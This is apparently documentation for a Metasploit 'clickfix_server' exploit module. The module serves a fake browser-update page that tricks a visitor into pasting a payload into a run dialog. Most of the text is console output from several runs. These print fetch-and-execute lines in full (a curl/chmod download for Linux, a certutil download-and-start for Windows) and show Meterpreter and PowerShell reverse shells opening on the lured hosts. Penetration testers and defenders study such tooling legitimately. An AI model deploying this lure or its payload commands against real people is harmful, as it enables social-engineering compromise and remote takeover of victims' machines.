documentation/modules/exploit/multi/misc/clickfix_server.md
This creates a Web Server which hosts a ClickFix type exploit. When a user visits the site they are given instructions on pasting our payload into a run dialog.
When using a custom html page, please use INSERT_PAYLOAD_HERE as the
spot to put the generated payload in.
use exploit/multi/misc/clickfix_serverset target #set payload [payload]runWeb server port to use
Template type to use. Choice are auto and custom. custom value requires custom to have a HTML file path.
Defaults to auto and uses a web browser update template.
Path to HTML file to use
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set target 1
target => 1
msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: curl -so ./CVMLVEkTDkF http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./CVMLVEkTDkF;./CVMLVEkTDkF&
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
msf exploit(multi/misc/clickfix_server) > [*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 1.1.1.1 clickfix_server - Request /clickfix from Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
[*] Sending payload to 1.1.1.1 (curl/8.18.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.1:35658) at 2026-03-31 11:36:15 -0400
msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer : kali
OS : Debian (Linux 6.18.12+kali-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/windows/http/x64/powershell_reverse_tcp
payload => cmd/windows/http/x64/powershell_reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/1GCX5ZG1X0p1DW6ox6kAqA %TEMP%\VjyHKreJan.exe & start /B %TEMP%\VjyHKreJan.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/clickfix_server) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /1GCX5ZG1X0p1DW6ox6kAqA
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0
[*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Powershell session session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55701) at 2026-03-31 12:08:43 -0400
msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...
PS C:\Windows\system32> whoami
DESKTOP-1GAUR72\h00die
PS C:\Windows\system32> Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer
WindowsProductName WindowsVersion OsHardwareAbstractionLayer
------------------ -------------- --------------------------
Windows 10 Pro 2009 10.0.19041.6456
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\gXDMGfSOa.exe & start /B %TEMP%\gXDMGfSOa.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/clickfix_server) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (232006 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55757) at 2026-03-31 12:15:41 -0400
msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-1GAUR72\h00die
meterpreter > sysinfo
Computer : DESKTOP-1GAUR72
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
msf > use exploit/multi/misc/clickfix_server
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/misc/clickfix_server) > set uripath clickfix
uripath => clickfix
msf exploit(multi/misc/clickfix_server) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\lZCpTwOgv.exe & start /B %TEMP%\lZCpTwOgv.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/clickfix_server) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1/clickfix
[*] Server started.
[*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (232006 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55832) at 2026-03-31 12:18:33 -0400
msf exploit(multi/misc/clickfix_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-1GAUR72\h00die
meterpreter > sysinfo
Computer : DESKTOP-1GAUR72
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >